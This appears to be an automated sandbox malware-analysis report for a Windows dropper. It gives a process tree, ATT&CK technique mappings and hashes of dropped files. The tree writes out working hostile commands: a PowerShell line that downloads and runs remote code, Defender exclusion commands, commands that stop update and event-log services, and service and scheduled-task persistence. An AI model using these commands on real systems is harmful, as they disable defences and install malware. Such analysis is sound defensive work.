PID 4796 wrote to memory of 2244	4796	cmd.exe	114
PID 4796 wrote to memory of 2244	4796	cmd.exe	114
PID 4796 wrote to memory of 2244	4796	cmd.exe	114
PID 4796 wrote to memory of 2404	4796	cmd.exe	115
PID 4796 wrote to memory of 2404	4796	cmd.exe	115
PID 4796 wrote to memory of 2404	4796	cmd.exe	115
PID 4796 wrote to memory of 1344	4796	cmd.exe	116
PID 4796 wrote to memory of 1344	4796	cmd.exe	116
PID 4796 wrote to memory of 1344	4796	cmd.exe	116
PID 3136 wrote to memory of 1092	3136	Setup.exe	120
PID 3136 wrote to memory of 1092	3136	Setup.exe	120
PID 3136 wrote to memory of 1092	3136	Setup.exe	120
PID 2108 wrote to memory of 4648	2108	sysppvrdnvs.exe	123
PID 2108 wrote to memory of 4648	2108	sysppvrdnvs.exe	123
PID 4648 wrote to memory of 2320	4648	2871131115.exe	124
PID 4648 wrote to memory of 2320	4648	2871131115.exe	124
PID 4648 wrote to memory of 4540	4648	2871131115.exe	126
PID 4648 wrote to memory of 4540	4648	2871131115.exe	126
PID 4540 wrote to memory of 1500	4540	cmd.exe	128
PID 4540 wrote to memory of 1500	4540	cmd.exe	128
PID 2320 wrote to memory of 2408	2320	cmd.exe	129
PID 2320 wrote to memory of 2408	2320	cmd.exe	129
PID 2108 wrote to memory of 1776	2108	sysppvrdnvs.exe	130
PID 2108 wrote to memory of 1776	2108	sysppvrdnvs.exe	130
PID 2108 wrote to memory of 1776	2108	sysppvrdnvs.exe	130
PID 3136 wrote to memory of 3256	3136	Setup.exe	131
PID 3136 wrote to memory of 3256	3136	Setup.exe	131
PID 3136 wrote to memory of 3256	3136	Setup.exe	131
PID 3136 wrote to memory of 1504	3136	Setup.exe	132
PID 3136 wrote to memory of 1504	3136	Setup.exe	132
PID 3136 wrote to memory of 1504	3136	Setup.exe	132
PID 3136 wrote to memory of 1484	3136	Setup.exe	133
PID 3136 wrote to memory of 1484	3136	Setup.exe	133

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3380
- C:\Users\Admin\AppData\Local\Temp\Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3136
- - C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2052
  - - C:\Users\Admin\AppData\Local\Temp\3165111428.exe
      C:\Users\Admin\AppData\Local\Temp\3165111428.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3500
- - C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1992
  - - C:\Windows\sysppvrdnvs.exe
      C:\Windows\sysppvrdnvs.exe
      4⤵
      Modifies security service
      Windows security bypass
      Checks computer location settings
      Executes dropped EXE
      Windows security modification
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2108
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2800
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3472
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4796
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:4440
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:3468
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2244
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:2404
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        6⤵
        Launches sc.exe
        System Location Discovery: System Language Discovery
        
        PID:1344
    - - C:\Users\Admin\AppData\Local\Temp\2871131115.exe
        
        C:\Users\Admin\AppData\Local\Temp\2871131115.exe
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4648
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2320
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        7⤵
        
        PID:2408
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4540
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        7⤵
        
        PID:1500
    - - C:\Users\Admin\AppData\Local\Temp\3241622431.exe
        
        C:\Users\Admin\AppData\Local\Temp\3241622431.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1776
    - - C:\Users\Admin\AppData\Local\Temp\398117829.exe
        
        C:\Users\Admin\AppData\Local\Temp\398117829.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3044
      - C:\Users\Admin\AppData\Local\Temp\1561811205.exe
        
        C:\Users\Admin\AppData\Local\Temp\1561811205.exe
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4748
    - - C:\Users\Admin\AppData\Local\Temp\50729193.exe
        
        C:\Users\Admin\AppData\Local\Temp\50729193.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4728
- - C:\Users\Admin\AppData\Local\Temp\http31.41.244.11filesEDge.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\http31.41.244.11filesEDge.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4608
  - - C:\Users\Admin\AppData\Roaming\Edge\Edge.exe
      "C:\Users\Admin\AppData\Roaming\Edge\Edge.exe" {6B387F7B-F5A9-4597-ABB2-EB1AC679F320}
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Adds Run key to start application
      PID:2620
- - C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com2.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com2.exe.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:1092
- - C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com3.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com3.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3256
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3252
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4240
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1304
- - C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com1.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com1.exe.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1504
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 1380
      4⤵
      Program crash
      PID:3580
- - C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com4.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com4.exe.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1484
- - C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3892
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2136
- - C:\Users\Admin\AppData\Local\Temp\httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1052
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:768
- - C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:3976
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:3252
- - C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2256
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:644
- - C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadsGoogle_Chrome.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadsGoogle_Chrome.exe.exe"
    3⤵
    - Executes dropped EXE
    PID:3500
- - C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe
    "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:4776
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3880
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1636
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:4688
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2952
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:5096
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:964
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:2432
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "WindowsUpdate"
      4⤵
      Launches sc.exe
      PID:3596
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:2940
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:1232
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "WindowsUpdate"
      4⤵
      Launches sc.exe
      PID:2460
- - C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgnhbghnj1kjhi1adownloadsNewApp.exe.exe
    "C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgnhbghnj1kjhi1adownloadsNewApp.exe.exe"
    3⤵
    PID:320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3376
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
  2⤵
  PID:2256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1232
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:2188
- C:\Windows\System32\dwm.exe
  C:\Windows\System32\dwm.exe
  2⤵
  PID:4604

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1504 -ip 1504
1⤵
PID:3088

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4148

C:\ProgramData\Windows11\Updater.exe
C:\ProgramData\Windows11\Updater.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:5000
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2164
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:3520
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1404
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2716
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2228
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4176
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1780
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:4136
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1788
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:4688

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
fee026663fcb662152188784794028ee

SHA1
3c02a26a9cb16648fad85c6477b68ced3cb0cb45

SHA256
dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b

SHA512
7b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GRYMSCZU\1[1]

Filesize
108KB

MD5
1fcb78fb6cf9720e9d9494c42142d885

SHA1
fef9c2e728ab9d56ce9ed28934b3182b6f1d5379

SHA256
84652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02

SHA512
cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ea70251772162d1436b65ff4fcc74171

SHA1
6e8897c5982c2d01ab0c24ec55a7008ddd95d5f8

SHA256
a69fdbc11ca78c70d3e86db3d038ff5919d3a4db74d4a1c43ef17d5a602843e1

SHA512
7b3853c2f38bca4186c74567f3cae97e13a624474ba34db29ce615860a96213d4492b289c78f0f5466c0ab12bb07ecfa72525491430f322e186676a4c1b8b3a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d95b08252ed624f6d91b46523f110f29

SHA1
17577997bc1fb5d3fbe59be84013165534415dc3

SHA256
342ce7c39bf9992d31d4b61ef138b2b084c96c74736ed00bb19aae49be16ca02

SHA512
0c4288176d56f4ee6d8f08f568fba07ad859f50a395c39d2afd3baf55d3d29ca065a1ce305d1bd790477c35977c0ffa230543e805622f80a77bcee71b24eb257

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e91c6c204eb70509a3e870f9789898a9

SHA1
2b56b9265ebf9395beb56c45fd2305510b7bbbdc

SHA256
503eec0cea2c91719c0d98dff01de410f506a96f8c81c086c1a1ab7f16137041

SHA512
236a9999011e529159188051f8532d5ce5c74db10b31c9c19c9c74bf3e1748c77a70838e11a2b10e1cec01c3a7a68361abf81f3a64e60f4427774bf7bafd156b

Download Submit
C:\Users\Admin\AppData\Local\Temp\1561811205.exe

Filesize
5.6MB

MD5
13b26b2c7048a92d6a843c1302618fad

SHA1
89c2dfc01ac12ef2704c7669844ec69f1700c1ca

SHA256
1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256

SHA512
d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455

Download Submit
C:\Users\Admin\AppData\Local\Temp\2871131115.exe

Filesize
8KB

MD5
cb8420e681f68db1bad5ed24e7b22114

SHA1
416fc65d538d3622f5ca71c667a11df88a927c31

SHA256
5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea

SHA512
baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\3241622431.exe

Filesize
15KB

MD5
0c37ee292fec32dba0420e6c94224e28

SHA1
012cbdddaddab319a4b3ae2968b42950e929c46b

SHA256
981d724feebc36777e99513dc061d1f009e589f965c920797285c46d863060d1

SHA512
2b60b571c55d0441ba0cfc695f9db5cd12660ebec7effc7e893c3b7a1c6cb6149df487c31b8d748697e260cbc4af29331592b705ea9638f64a711c7a6164628b

Download Submit
C:\Users\Admin\AppData\Local\Temp\398117829.exe

Filesize
10KB

MD5
96509ab828867d81c1693b614b22f41d

SHA1
c5f82005dbda43cedd86708cc5fc3635a781a67e

SHA256
a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744

SHA512
ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\50729193.exe

Filesize
13KB

MD5
5a0d146f7a911e98da8cc3c6de8acabf

SHA1
4ec56b14a08c897a5e9e85f5545b6c976a0be3c1

SHA256
bf61e77b7c49ce3346a28d8bc084c210618ea6ec5f3cfa9ae8f4aa4d64e145f1

SHA512
6d1526a5f467535d51b7f9b3a7af2d54512526e2523e3048082277b83b6e1a1f0d7e3c617405898f240ae84a16163bc47886d8541a016b31c51dfadf9da713e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k4xtazo4.eyp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\http159.223.8.77xc.exe.exe

Filesize
53KB

MD5
85f9704596759ff2984d64236de10fc2

SHA1
ed948c13e6a69903a2ca8f0d04c6f806478193b9

SHA256
7852053939758f50f2fb5c01b0085d5fa6b0f927d95dfe910dc70a851062a578

SHA512
429095f62a480cd7029b8025260969124df35eb2163a13124662877caf732e97e47a9698c39faf8b958e9e8fad35b0c55c58533ab63c131b5b0e8528b5087dea

Download Submit
C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe

Filesize
9KB

MD5
8d8e6c7952a9dc7c0c73911c4dbc5518

SHA1
9098da03b33b2c822065b49d5220359c275d5e94

SHA256
feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278

SHA512
91a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645

Download Submit
C:\Users\Admin\AppData\Local\Temp\http31.41.244.11filesEDge.exe.exe

Filesize
2.4MB

MD5
f01ed03b7a786c24ebd92eab9b441b9d

SHA1
891c8ef7b9ef32e9d4de3ee473186cd4ba66059f

SHA256
6dc5fcbd3d05cb11dc4731aea996c7cbc213253c4d4b119799c5ddedebe537fb

SHA512
a8041c03e9fd9ab1c2bf4bb6fde3948c803b1592e24fdd112387249b83dff0309d14be6d7bdd19a4d1c5fee3b931e45b13c361e38ac15358afa7b82652cf55e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsRmMai.exe.exe

Filesize
10.2MB

MD5
4f4e640b100583635e7d7218bc03a047

SHA1
90fe08e4c8dd5fe7f5c6411529d8b41cef09746c

SHA256
b68f20b21290f3398b67a6c4b645d5ea94aeaf8e3da4272554b0b8e03753d08c

SHA512
772940dc7d6962f03d7cec23893b71408f69d8d4266f8d770164df012fea149cf21a3b1f67164ecacf938ed43c8bf3bb19966048e8a6056a739e7a9c4fe5b5ab

Download Submit
